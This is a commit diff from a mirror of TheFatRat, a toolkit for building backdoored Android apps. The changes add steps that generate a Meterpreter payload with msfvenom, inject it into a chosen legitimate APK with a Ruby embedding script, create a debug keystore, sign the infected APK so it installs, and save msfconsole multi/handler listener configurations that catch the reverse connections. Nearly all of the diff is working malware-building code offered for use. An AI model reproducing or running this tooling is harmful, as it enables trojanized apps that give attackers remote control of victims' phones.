mirror of
https://github.com/Screetsec/TheFatRat.git
synced 2023-12-14 02:02:58 +01:00
commit
535c4eb3a2
|
@ -1,5 +1,6 @@
|
||||||
## CHANGELOG
|
## CHANGELOG
|
||||||
|
|
||||||
|
* v1.9.2 - New signing process in old method backdoor apk & option to create listener
|
||||||
* v1.9.2 - Implemented possibility for user to save msfconsole listeners
|
* v1.9.2 - Implemented possibility for user to save msfconsole listeners
|
||||||
* v1.9.2 - Fixes in Microsploit
|
* v1.9.2 - Fixes in Microsploit
|
||||||
* v1.9.2 - Implemented local ip , public ip & hostname display to powerfull.sh
|
* v1.9.2 - Implemented local ip , public ip & hostname display to powerfull.sh
|
||||||
|
|
14
backdoor_apk
14
backdoor_apk
|
@ -589,3 +589,17 @@ echo -ne $green" Your RAT apk was successfully builded and signed , it is locate
|
||||||
$MY_PATH/backdoored/app_backdoor.apk"
|
$MY_PATH/backdoored/app_backdoor.apk"
|
||||||
rm -rf temp/* > /dev/null 2>&1
|
rm -rf temp/* > /dev/null 2>&1
|
||||||
fi
|
fi
|
||||||
|
zenity --question --text="`printf "Do you want to create a listener for this configuration \n to use in msfconsole in future ?"`"
|
||||||
|
if [ $? = 0 ] ; then
|
||||||
|
save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="myapk");
|
||||||
|
svf=$path/config/listeners/$save.rc
|
||||||
|
rm -rf $svf >/dev/null 2>&1
|
||||||
|
payloads=`sed -n 3p $apkconf`
|
||||||
|
yourip=`sed -n 4p $apkconf`
|
||||||
|
yourport=`sed -n 5p $apkconf`
|
||||||
|
echo "use exploit/multi/handler" > $svf
|
||||||
|
echo "set PAYLOAD $payloads" >> $svf
|
||||||
|
echo "set LHOST $yourip" >> $svf
|
||||||
|
echo "set LPORT $yourport" >> $svf
|
||||||
|
echo "exploit -j" >> $svf
|
||||||
|
echo -e okegreen "Configuration file saved to $list/$save.rc"
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
Folder Location for created Rat apks
|
Folder Location for created Rat apks
|
||||||
|
|
123
fatrat
Normal file → Executable file
123
fatrat
Normal file → Executable file
|
@ -22,7 +22,7 @@ okegreen='\033[92m'
|
||||||
lightgreen='\e[1;32m'
|
lightgreen='\e[1;32m'
|
||||||
white='\e[1;37m'
|
white='\e[1;37m'
|
||||||
red='\e[1;31m'
|
red='\e[1;31m'
|
||||||
yellow='\e[1;33m'
|
yellow='\e[0;33m'
|
||||||
BlueF='\e[1;34m' #Biru
|
BlueF='\e[1;34m' #Biru
|
||||||
RESET="\033[00m" #normal
|
RESET="\033[00m" #normal
|
||||||
orange='\e[38;5;166m'
|
orange='\e[38;5;166m'
|
||||||
|
@ -77,6 +77,7 @@ lanip=`ip addr | grep 'state UP' -A2 | tail -n1 | awk '{print $2}' | cut -f1 -d'
|
||||||
publicip=`dig +short myip.opendns.com @resolver1.opendns.com`
|
publicip=`dig +short myip.opendns.com @resolver1.opendns.com`
|
||||||
hostn=`host $publicip | awk '{print $5}'`
|
hostn=`host $publicip | awk '{print $5}'`
|
||||||
list=$path/config/listeners
|
list=$path/config/listeners
|
||||||
|
log=$path/logs/apk-old.log
|
||||||
|
|
||||||
# spinner for Metasploit Generator
|
# spinner for Metasploit Generator
|
||||||
spinlong ()
|
spinlong ()
|
||||||
|
@ -179,6 +180,8 @@ backdoor=`sed -n 16p $file`
|
||||||
searchsploit=`sed -n 17p $file`
|
searchsploit=`sed -n 17p $file`
|
||||||
aapt=`sed -n 11p $file`
|
aapt=`sed -n 11p $file`
|
||||||
apktool=`sed -n 12p $file`
|
apktool=`sed -n 12p $file`
|
||||||
|
keytool=`sed -n 7p $file`
|
||||||
|
sign=`sed -n 5p $file`
|
||||||
|
|
||||||
else
|
else
|
||||||
echo -e $red"Configuration file does not exists , run setup.sh first for config ."
|
echo -e $red"Configuration file does not exists , run setup.sh first for config ."
|
||||||
|
@ -1678,32 +1681,78 @@ menu
|
||||||
;;
|
;;
|
||||||
|
|
||||||
"Use old Fatrat method")
|
"Use old Fatrat method")
|
||||||
echo ""
|
echo -e $okegreen ""
|
||||||
spinlong
|
spinlong
|
||||||
|
|
||||||
|
#removing previous logs
|
||||||
|
rm -rf $log >/dev/null 2>&1
|
||||||
|
touch $log >/dev/null 2>&1
|
||||||
|
|
||||||
outf="app_backdoored.apk"
|
outf="app_backdoored.apk"
|
||||||
gboor2
|
gboor2
|
||||||
echo "Creating RAT payload with msfvenom"
|
|
||||||
echo -e $okegreen ""
|
echo -e $okegreen ""
|
||||||
$msfvenom -f raw -p $payload LHOST=$yourip LPORT=$yourport -o $path/temp/payload.apk
|
echo "[*] Creating RAT payload with msfvenom"
|
||||||
echo "Done !"
|
|
||||||
|
#Creating payload and storing info in logfile
|
||||||
|
$msfvenom -f raw -p $payload LHOST=$yourip LPORT=$yourport -o $path/temp/payload.apk >>$log /dev/null 2>&1
|
||||||
|
|
||||||
|
#Checking if payload exists
|
||||||
|
pld=$path/temp/payload.apk
|
||||||
|
if [ -f "$pld" ]
|
||||||
|
then
|
||||||
|
echo "[✔] Done!"
|
||||||
|
else
|
||||||
|
echo -e $red ""
|
||||||
|
echo "[x] There was an error in the creation of the payload .
|
||||||
|
Check log file at : $log"
|
||||||
|
rm -rf temp/* > /dev/null 2>&1
|
||||||
|
menu
|
||||||
|
fi
|
||||||
sleep 2
|
sleep 2
|
||||||
echo "Starting the merging process of RAT with the APK you selected"
|
echo "[*] Creating a Valid Certificate"
|
||||||
echo ""
|
|
||||||
ruby $apkembed $path/temp/app.apk
|
#Creating certificate and storing info in logfile
|
||||||
echo ""
|
$keytool -genkey -v -keystore $path/temp/debug.keystore -storepass android -alias androiddebugkey -keypass android -dname "CN=Android Debug,O=Android,C=US" -keyalg RSA -keysize 2048 -validity 10000 >>$log 2>&1
|
||||||
|
|
||||||
|
#Checking if certificate was created
|
||||||
|
cert=$path/temp/debug.keystore
|
||||||
|
if [ -f "$cert" ]
|
||||||
|
then
|
||||||
|
echo "[✔] Done!"
|
||||||
|
else
|
||||||
|
echo -e $red ""
|
||||||
|
echo "[x] There was an error creating a valid certificate .
|
||||||
|
Check log file at : $log"
|
||||||
|
rm -rf temp/* > /dev/null 2>&1
|
||||||
|
menu
|
||||||
|
fi
|
||||||
sleep 2
|
sleep 2
|
||||||
|
|
||||||
|
echo "[*] Starting the merging process of RAT with the APK you selected"
|
||||||
|
echo -e $okegreen ""
|
||||||
|
|
||||||
|
#Starting the process of inserting the payload into original apk file
|
||||||
|
ruby $apkembed $path/temp/app.apk
|
||||||
|
sleep 2
|
||||||
|
|
||||||
|
echo -e $okegreen ""
|
||||||
|
#Checking if backdoor apk was created succefully
|
||||||
fiapk=$path/temp/app_backdoored.apk
|
fiapk=$path/temp/app_backdoored.apk
|
||||||
if [ -f "$fiapk" ]
|
if [ -f "$fiapk" ]
|
||||||
then
|
then
|
||||||
echo -e $green "[*] Backdoor apk created sucefully"
|
echo "[✔] Done!"
|
||||||
|
sleep 1
|
||||||
|
echo "[*] Signing your Rat APK"
|
||||||
|
$sign -verbose -keystore $path/temp/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA $path/temp/app_backdoored.apk androiddebugkey >>$log 2>&1
|
||||||
|
echo "[✔] Done!"
|
||||||
else
|
else
|
||||||
echo -e $red "[!] There was an error in the creation of your RAT APK file , the possible reasons are :
|
echo $red ""
|
||||||
|
echo "[x] There was an error in the creation of your RAT APK file , the possible reasons are :
|
||||||
- The architecture of the file is not for android
|
- The architecture of the file is not for android
|
||||||
- The original APK is protected
|
- The original APK is protected
|
||||||
- It was not possible to inject the payload in the hook you selected (in this case select a different hook point)"
|
- It was not possible to inject the payload in the hook you selected (in this case select a different hook point)
|
||||||
echo -e $green ""
|
Check log file at : $log"
|
||||||
rm -rf temp/* > /dev/null 2>&1
|
echo -e $okegreen ""
|
||||||
read -rsp $'Press any key to return to fatrat menu\n' -n 1 key
|
read -rsp $'Press any key to return to fatrat menu\n' -n 1 key
|
||||||
menu
|
menu
|
||||||
fi
|
fi
|
||||||
|
@ -1714,28 +1763,58 @@ ren=`shuf -i 1-1000 -n 1`
|
||||||
back=$path/backdoored/app_backdoored.apk
|
back=$path/backdoored/app_backdoored.apk
|
||||||
if [ -f "$back" ]
|
if [ -f "$back" ]
|
||||||
then
|
then
|
||||||
mv $path/backdoored/app_backdoored.apk $path/backdoored/app_backdoored_$ren.apk
|
mv $path/backdoored/app_backdoored.apk $path/backdoored/app_backdoored_$ren.apk >>$log 2>&1
|
||||||
echo -e $yellow "FatRat Detected that you already had a previous created backdoor
|
echo -e $yellow ""
|
||||||
|
echo "[!] FatRat Detected that you already had a previous created backdoor
|
||||||
file in ($path/backdoored/) with the name app_backdoored.apk ."
|
file in ($path/backdoored/) with the name app_backdoored.apk ."
|
||||||
echo -e $okegreen "FatRat have renamed your old backdoor to app_backdoored_$ren.apk"
|
echo -e $okegreen ""
|
||||||
mv $path/temp/app_backdoored.apk $path/backdoored/app_backdoored.apk
|
echo "[✔] FatRat have renamed your old backdoor to app_backdoored_$ren.apk"
|
||||||
|
|
||||||
|
# Moving apk backdoor to final destination
|
||||||
|
mv $path/temp/app_backdoored.apk $path/backdoored/app_backdoored.apk >>$log 2>&1
|
||||||
|
|
||||||
|
# Removing temp files
|
||||||
|
rm -rf temp/* > /dev/null 2>&1
|
||||||
else
|
else
|
||||||
mv $path/temp/app_backdoored.apk $path/backdoored/app_backdoored.apk
|
|
||||||
|
|
||||||
|
# Moving apk backdoor to final destination
|
||||||
|
mv $path/temp/app_backdoored.apk $path/backdoored/app_backdoored.apk >>$log 2>&1
|
||||||
|
rm -rf temp/* > /dev/null 2>&1
|
||||||
fi
|
fi
|
||||||
|
|
||||||
varopt="$path/backdoored/app_backdoored.apk"
|
varopt="$path/backdoored/app_backdoored.apk"
|
||||||
if [ ! -f $varopt ]; then
|
if [ ! -f $varopt ]; then
|
||||||
echo -e $red "[!] There was an error copying your Rat app to final destination"
|
echo -e $red ""
|
||||||
|
echo "[x] There was an error copying your Rat app to final destination .
|
||||||
|
Check log file at : $log"
|
||||||
|
rm -rf temp/* > /dev/null 2>&1
|
||||||
|
echo -e $okegreen ""
|
||||||
read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
|
read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
|
||||||
menu
|
menu
|
||||||
fi
|
fi
|
||||||
|
|
||||||
echo -e $yellow "Your payload has been successfully & signed and it is located at :
|
echo -e $green ""
|
||||||
|
echo "Your payload has been successfully & signed and it is located at :
|
||||||
$path/backdoored/app_backdoored.apk"
|
$path/backdoored/app_backdoored.apk"
|
||||||
sleep 2
|
sleep 2
|
||||||
echo -e $okegreen "Removing temporary files"
|
echo -e $okegreen ""
|
||||||
|
echo "[*] Removing temporary files"
|
||||||
sleep 2
|
sleep 2
|
||||||
rm -rf $path/temp/* >/dev/null 2>&1
|
rm -rf $path/temp/* >/dev/null 2>&1
|
||||||
|
echo "[✔] Done!"
|
||||||
|
zenity --question --text="`printf "Do you want to create a listener for this configuration \n to use in msfconsole in future ?"`"
|
||||||
|
if [ $? = 0 ] ; then
|
||||||
|
save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="myapk");
|
||||||
|
svf=$path/config/listeners/$save.rc
|
||||||
|
rm -rf $svf >/dev/null 2>&1
|
||||||
|
echo "use exploit/multi/handler" > $svf
|
||||||
|
echo "set PAYLOAD $payload" >> $svf
|
||||||
|
echo "set LHOST $yourip" >> $svf
|
||||||
|
echo "set LPORT $yourport" >> $svf
|
||||||
|
echo "exploit -j" >> $svf
|
||||||
|
echo -e $okegreen "Configuration file saved to $list/$save.rc"
|
||||||
|
fi
|
||||||
echo -e $okegreen ""
|
echo -e $okegreen ""
|
||||||
read -rsp $'Press any key to return to fatrat menu\n' -n 1 key
|
read -rsp $'Press any key to return to fatrat menu\n' -n 1 key
|
||||||
echo
|
echo
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
Don't Delete the Folder and dont change directory name , if you change you must change the script too
|
Don't Delete the Folder and dont change directory name , if you change you must change the script too
|
||||||
|
|
1
setup.sh
Normal file → Executable file
1
setup.sh
Normal file → Executable file
|
@ -209,7 +209,6 @@ which ruby >> $log 2>&1
|
||||||
sleep 2
|
sleep 2
|
||||||
fi
|
fi
|
||||||
|
|
||||||
|
|
||||||
#Checking if Jarsigner exists
|
#Checking if Jarsigner exists
|
||||||
which jarsigner > /dev/null 2>&1
|
which jarsigner > /dev/null 2>&1
|
||||||
if [ "$?" -eq "0" ]; then
|
if [ "$?" -eq "0" ]; then
|
||||||
|
|
|
@ -1 +0,0 @@
|
||||||
Don't Delete the Folder temp and dont change directory name , if you change you must change the scripttoo
|
|
|
@ -153,7 +153,7 @@ unless(apk_v.split()[1].include?("v2."))
|
||||||
end
|
end
|
||||||
|
|
||||||
print "[*] Signing payload..\n"
|
print "[*] Signing payload..\n"
|
||||||
`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA 'temp/payload.apk' androiddebugkey`
|
`jarsigner -verbose -keystore temp/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA 'temp/payload.apk' androiddebugkey`
|
||||||
|
|
||||||
`rm -rf temp/original`
|
`rm -rf temp/original`
|
||||||
`rm -rf temp/payload`
|
`rm -rf temp/payload`
|
||||||
|
@ -204,7 +204,5 @@ fix_manifest()
|
||||||
|
|
||||||
print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n"
|
print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n"
|
||||||
`apktool b -o #{injected_apk} temp/original`
|
`apktool b -o #{injected_apk} temp/original`
|
||||||
print "[*] Signing #{injected_apk} ..\n"
|
|
||||||
`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey`
|
|
||||||
|
|
||||||
puts "[+] Infected file #{injected_apk} ready.\n"
|
puts "[+] Infected file #{injected_apk} ready.\n"
|
||||||
|
|
|
@ -1,27 +0,0 @@
|
||||||
-----BEGIN CERTIFICATE-----
|
|
||||||
MIIEqDCCA5CgAwIBAgIJAJNurL4H8gHfMA0GCSqGSIb3DQEBBQUAMIGUMQswCQYD
|
|
||||||
VQQGEwJVUzETMBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UEBxMNTW91bnRhaW4g
|
|
||||||
VmlldzEQMA4GA1UEChMHQW5kcm9pZDEQMA4GA1UECxMHQW5kcm9pZDEQMA4GA1UE
|
|
||||||
AxMHQW5kcm9pZDEiMCAGCSqGSIb3DQEJARYTYW5kcm9pZEBhbmRyb2lkLmNvbTAe
|
|
||||||
Fw0wODAyMjkwMTMzNDZaFw0zNTA3MTcwMTMzNDZaMIGUMQswCQYDVQQGEwJVUzET
|
|
||||||
MBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UEBxMNTW91bnRhaW4gVmlldzEQMA4G
|
|
||||||
A1UEChMHQW5kcm9pZDEQMA4GA1UECxMHQW5kcm9pZDEQMA4GA1UEAxMHQW5kcm9p
|
|
||||||
ZDEiMCAGCSqGSIb3DQEJARYTYW5kcm9pZEBhbmRyb2lkLmNvbTCCASAwDQYJKoZI
|
|
||||||
hvcNAQEBBQADggENADCCAQgCggEBANaTGQTexgskse3HYuDZ2CU+Ps1s6x3i/waM
|
|
||||||
qOi8qM1r03hupwqnbOYOuw+ZNVn/2T53qUPn6D1LZLjk/qLT5lbx4meoG7+yMLV4
|
|
||||||
wgRDvkxyGLhG9SEVhvA4oU6Jwr44f46+z4/Kw9oe4zDJ6pPQp8PcSvNQIg1QCAcy
|
|
||||||
4ICXF+5qBTNZ5qaU7Cyz8oSgpGbIepTYOzEJOmc3Li9kEsBubULxWBjf/gOBzAzU
|
|
||||||
RNps3cO4JFgZSAGzJWQTT7/emMkod0jb9WdqVA2BVMi7yge54kdVMxHEa5r3b97s
|
|
||||||
zI5p58ii0I54JiCUP5lyfTwE/nKZHZnfm644oLIXf6MdW2r+6R8CAQOjgfwwgfkw
|
|
||||||
HQYDVR0OBBYEFEhZAFY9JyxGrhGGBaR0GawJyowRMIHJBgNVHSMEgcEwgb6AFEhZ
|
|
||||||
AFY9JyxGrhGGBaR0GawJyowRoYGapIGXMIGUMQswCQYDVQQGEwJVUzETMBEGA1UE
|
|
||||||
CBMKQ2FsaWZvcm5pYTEWMBQGA1UEBxMNTW91bnRhaW4gVmlldzEQMA4GA1UEChMH
|
|
||||||
QW5kcm9pZDEQMA4GA1UECxMHQW5kcm9pZDEQMA4GA1UEAxMHQW5kcm9pZDEiMCAG
|
|
||||||
CSqGSIb3DQEJARYTYW5kcm9pZEBhbmRyb2lkLmNvbYIJAJNurL4H8gHfMAwGA1Ud
|
|
||||||
EwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADggEBAHqvlozrUMRBBVEY0NqrrwFbinZa
|
|
||||||
J6cVosK0TyIUFf/azgMJWr+kLfcHCHJsIGnlw27drgQAvilFLAhLwn62oX6snb4Y
|
|
||||||
LCBOsVMR9FXYJLZW2+TcIkCRLXWG/oiVHQGo/rWuWkJgU134NDEFJCJGjDbiLCpe
|
|
||||||
+ZTWHdcwauTJ9pUbo8EvHRkU3cYfGmLaLfgn9gP+pWA7LFQNvXwBnDa6sppCccEX
|
|
||||||
31I828XzgXpJ4O+mDL1/dBd+ek8ZPUP0IgdyZm5MTYPhvVqGCHzzTy3sIeJFymwr
|
|
||||||
sBbmg2OAUNLEMO6nwmocSdN2ClirfxqCzJOLSDE4QyS9BAH6EhY6UFcOaE0=
|
|
||||||
-----END CERTIFICATE-----
|
|
BIN
tools/key.pk8
BIN
tools/key.pk8
Binary file not shown.
Binary file not shown.
Loading…
Reference in a new issue